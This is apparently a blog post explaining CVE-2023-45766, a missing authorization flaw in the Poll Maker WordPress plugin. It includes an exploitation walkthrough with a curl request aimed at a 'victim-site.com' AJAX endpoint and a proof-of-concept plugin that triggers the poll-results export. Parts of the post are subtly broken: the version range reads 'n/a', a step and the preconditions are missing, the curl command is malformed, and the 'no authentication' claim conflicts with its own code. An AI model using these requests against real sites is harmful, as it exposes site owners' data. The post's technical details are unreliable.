CVE-2023-45766 is a serious security flaw found in the popular “Poll Maker” plugin for WordPress. If you run a site where users can vote in polls, you might use this plugin — but from version n/a up to 4.7.1, your site could be at risk because of incorrectly configured access controls. In simple terms: someone can perform restricted actions without proper permissions.
This post will break down what the vulnerability is, show you how it can be exploited, provide a clear code example, and connect you with original sources for further reading.
What is Poll Maker?
Poll Maker is an easy-to-use plugin that lets you add interactive polls to your WordPress website. It’s widely used, which makes any security issue potentially dangerous for thousands of websites.
Versions affected: all versions up to 4.7.1
- Discovered by: security researchers (see WPScan entry and Patchstack advisory)
What Is Missing Authorization?
This is when a function (like deleting a poll, changing options, or exporting data) doesn't properly check that the user has the “right” permissions. An attacker can send crafted requests to the site and bypass restrictions.
Here’s a *simplified* version of what happens under the hood
// A fictional vulnerable endpoint in Poll Maker's AJAX handling
add_action('wp_ajax_export_poll_results', 'poll_maker_export_poll_results');
function poll_maker_export_poll_results() {
// MISSING: current_user_can('manage_options') or similar check
$poll_id = $_POST['poll_id'];
$results = get_poll_results($poll_id);
echo json_encode($results);
wp_die();
}
In this case, the function should check if the user has enough permissions (like being an admin) *before* exporting the results. But it doesn't, which means any logged-in user (or even a guest if set up wrongly) can trigger it.
How to Exploit CVE-2023-45766
Preconditions:
Step 1: Find the AJAX Endpoint
In WordPress, all AJAX requests usually go to /wp-admin/admin-ajax.php.
Use a tool like Postman or curl
curl -X POST 'https://victim-site.com/wp-admin/admin-ajax.php'; \
-d 'action=export_poll_results&poll_id=1'
Step 3: Receive Sensitive Data
Because there’s no authentication, the server replies with complete poll results, even if you’re not supposed to see them.
Attackers could automate this to extract data or try to escalate privileges if other admin functions are unprotected.
Proof-of-Concept Plugin (For Testing ONLY!)
Here’s a sample plugin code to test the flaw on your own staging site *(Never run this on real production!)*:
<?php
/*
Plugin Name: Exploit Poll Maker Export
*/
add_action('init', function() {
if (isset($_GET['exploit_poll']) && is_user_logged_in()) {
$poll_id = intval($_GET['poll_id'] ?? 1);
$response = wp_remote_post(
admin_url('admin-ajax.php'),
[
'body' => [
'action' => 'export_poll_results',
'poll_id' => $poll_id,
]
]
);
$body = wp_remote_retrieve_body($response);
echo '<pre>Poll Export Data: ', esc_html($body), '</pre>';
exit;
}
});
*Use responsibly for testing with permission only!*
How Can You Fix It?
- Update Poll Maker: Get the latest version here. The developers have patched this in later releases.
- Review Other Plugins: Missing authorization checks are a common source of WordPress plugin security bugs. Make sure all your plugins are up to date.
References
- WPScan: Vulnerability entry
- Patchstack: Advisory page
- Official Plugin: Poll Maker on WordPress.org
- Wordfence advisory
Bottom Line
CVE-2023-45766 in Poll Maker exposes sensitive data (and possibly lets hackers perform admin functions) because it doesn’t properly check if you’re allowed to do certain things.
If you use Poll Maker, update right now! Don’t wait until your polls — or worse, your users’ data — fall into the wrong hands.
Questions? Thoughts? Drop them below, and remember: keep your WP plugins updated and always check for authorization logic!
Timeline
Published on: 01/02/2025 12:15:10 UTC